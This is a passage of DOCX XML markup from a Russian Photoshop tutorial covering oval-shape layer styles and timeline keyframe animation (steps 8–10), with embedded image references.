            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 8.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Создайте овальную фигуру и установите цвет # </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>fdfcfc</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1404010" cy="1445386"/>
                  <wp:effectExtent l="19050" t="0" r="5690" b="0"/>
                  <wp:docPr id="76" name="Рисунок 774" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image032.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId478" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1407726" cy="1449211"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5068" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1408972" cy="1447200"/>
                  <wp:effectExtent l="19050" t="0" r="728" b="0"/>
                  <wp:docPr id="77" name="Рисунок 775" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image033.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId479" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1410674" cy="1448948"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Откройте диалоговое окно </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Стили слоя</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (layerstyles) и настройте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тень</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Dropshadow). Уменьшите </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>расстояние</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (distance ) и </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>размер</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (size ) на 1px.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1401470" cy="1840851"/>
                  <wp:effectExtent l="19050" t="0" r="8230" b="0"/>
                  <wp:docPr id="78" name="Рисунок 778" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image034.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId480" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1405200" cy="1845751"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5068" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Включите и проверьте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Внутреннее свечение</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Innerglow) и оставьте в настройках все как есть.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1405915" cy="1888765"/>
                  <wp:effectExtent l="19050" t="0" r="3785" b="0"/>
                  <wp:docPr id="85" name="Рисунок 779" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image035.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId481" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1407362" cy="1890709"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Добавьте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наложение градиента</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (GradientOverlay) с </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Непрозрачностью</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Opacity) 6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2104950" cy="2088244"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="87" name="Рисунок 780" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/im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http://ok-t.ru/studopedia/baza14/71156389034.files/image036.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId482" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2104695" cy="2087991"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5068" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1550376" cy="1756800"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="88" name="Рисунок 781" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image037.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId483" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1551717" cy="1758319"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь, когда мы закончили создание всех наших сло</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">в, мы готовы приступить к работе по анимации. Во-первых, откройте панель анимации </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Окно – Анимация</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Window&gt;Animation). Я буду использовать панель анимации по </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Временной шкале</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TimelineAnimation), а не в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Покадровой анимации</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (frameanimation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эта функция доступна только в PhotoshopExtended.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь устанавливаем все слои видимыми, но уменьшаем их непрозрачность до 0%. Фон не трогаем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2976150" cy="1771475"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="782" name="Рисунок 782" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image038.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId484" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2976256" cy="1771538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 10.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Смотрите изображения ниже для инструкций о том, как вставлять ключевые кадры и где увеличивать непрозрачность. Для каждого созданного нами элемента отдельный скриншот с инструкцией.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Прим. переводчика: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ключевые кадры можно будет перемещать мышкой. Так же можно выделить несколько ключевых кадров для перемещения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="974550" cy="357693"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="783" name="Рисунок 783" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image039.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId485" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="973778" cy="357410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3775350" cy="688953"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="784" name="Рисунок 784" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image040.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId486" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3780863" cy="689959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1204950" cy="429920"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="785" name="Рисунок 785" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image041.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId487" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1206388" cy="430433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3206550" cy="539571"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="786" name="Рисунок 786" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image042.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId488" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
